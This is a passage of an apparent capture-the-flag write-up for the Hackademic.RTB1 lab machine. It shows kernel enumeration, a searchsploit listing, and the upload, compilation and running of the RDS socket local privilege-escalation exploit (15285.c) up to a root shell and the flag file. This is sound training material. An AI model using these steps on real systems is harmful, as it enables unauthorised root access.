# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  *  command to be executed
bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
bash-4.0$
bash-4.0$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for apache:
Sorry, try again.

Privilege escalation

searchsploit Linux Kernel 2.6.3
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation             | solaris/local/15962.c
Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation                        | linux/local/4756.c
Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure                           | linux/local/9363.c
Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service         | linux/dos/1880.c
Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3)       | linux/local/9575.c
Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)        | linux/local/9574.txt
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak                        | linux/local/4172.c
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation             | linux/local/6851.c
Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure                               | linux/local/7618.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation                  | linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation                    | linux/local/8369.sh
Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service                         | linux/dos/9442.c
Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service                      | linux/dos/10202.c
Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)                    | linux/local/9543.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation | linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escala | linux/local/15944.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation  | linux/local/17787.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalat | linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalatio | linux_x86-64/local/15023.c
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosur | linux/local/15150.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation           | linux/local/15774.c
Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)         | linux/dos/16952.c
Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership | linux/local/718.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation                     | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation          | linux_x86-64/local/44302.c
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalati | linux_x86-64/local/34134.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation             | arm/local/31574.c
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privileg | linux_x86-64/local/44299.c
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)    | linux_x86-64/local/26131.c
Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escal | linux/local/25450.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service          | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                          | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation     | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)                               | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation         | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service                                     | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak                              | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption                  | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free                                        | linux/dos/44579.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local | linux/local/47169.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privileg | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalatio | linux/local/43418.c
Linux Kernel < 4.5.1 - Off-By-One (PoC)                                               | linux/dos/44301.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalatio | linux/local/9844.py
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalat | linux/local/19933.rb
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'i | linux_x86/local/9542.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)                 | linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation                  | linux/local/40812.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation    | linux_x86-64/local/15024.c
Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service                             | linux/dos/274.c
Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)                  | linux/local/9521.c
Linux Kernel 2.6.30 - 'tun_chr_pool()' Null Pointer Dereference                       | linux/dos/33088.txt
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation        | linux/local/9191.txt
Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow                     | linux/dos/33228.txt
Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service               | linux/dos/10022.c
Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure                         | linux/local/9352.c
Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure                | linux/local/9513.c
Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)                         | linux/local/10018.sh
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation       | linux/local/41770.txt
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure | linux/local/24459.sh
Linux Kernel 2.6.32-642/3.16.0-4 - 'inode' Integer Overflow                           | linux/dos/40819.c
Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak                                      | linux_x86-64/local/40811.c
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service                            | linux/dos/14594.py
Linux Kernel 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption                | linux/dos/33886.txt
Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service                      | linux/dos/36425.txt
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite                   | linux/local/15344.c
Linux Kernel 2.6.36 IGMP - Remote Denial of Service                                   | linux/dos/18378.c
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                   | linux/local/15285.c
Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)                              | linux/dos/16263.c
Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service                           | linux/dos/15619.c
Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service                            | linux/dos/15622.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalat | linux/local/15704.c
Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak            | linux/local/18080.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege | linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)  | linux/local/35161.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege E | linux_x86-64/local/33516.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                  | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                            | linux/local/41886.c
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution                             | multiple/remote/38454.py
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege E | linux/local/12130.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

uname shows kernel 2.6.31.5, and 15285.c (the RDS socket exploit) announces itself as targeting kernels >= 2.6.30, so it is a candidate; it works here:

Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                   | linux/local/15285.c

Upload it to /tmp via AntSword, compile with gcc on the target (a compiler is installed) and run it. As its output shows, it resolves commit_creds and prepare_kernel_cred, overwrites a security_ops function pointer to reach them, and drops into a root shell.

sh-4.0$ cd /tmp
cd /tmp
sh-4.0$ ls
ls
15285.c  crontab.XXXXsskXAR  orbit-gdm  pulse-PKdhtXMmr18n
sh-4.0$ gcc -o exp 15285.c
gcc -o exp 15285.c
sh-4.0$ chmod +x exp
chmod +x exp
sh-4.0$ ./exp
./exp
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
sh-4.0# ls
ls
15285.c  crontab.XXXXsskXAR  exp  orbit-gdm  pulse-PKdhtXMmr18n
sh-4.0# whoami
whoami
root
sh-4.0#

flag

sh-4.0# cd /root
cd /root
sh-4.0# ls
ls
Desktop  anaconda-ks.cfg  key.txt  key.txt~
sh-4.0# cat key.txt
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
$_d&jgQ>>ak\#b"(Hx"o<la_%
Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com
sh-4.0# cat key.txt~
cat key.txt~
Yeah!!
You must be proud becouse you ve got the password to complete the First Reallistic Hackademic Challenge (Hackademic.RTB1) :)
$_d&jgQ>>ak\#b"(Hx"o<la_%
Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com
sh-4.0#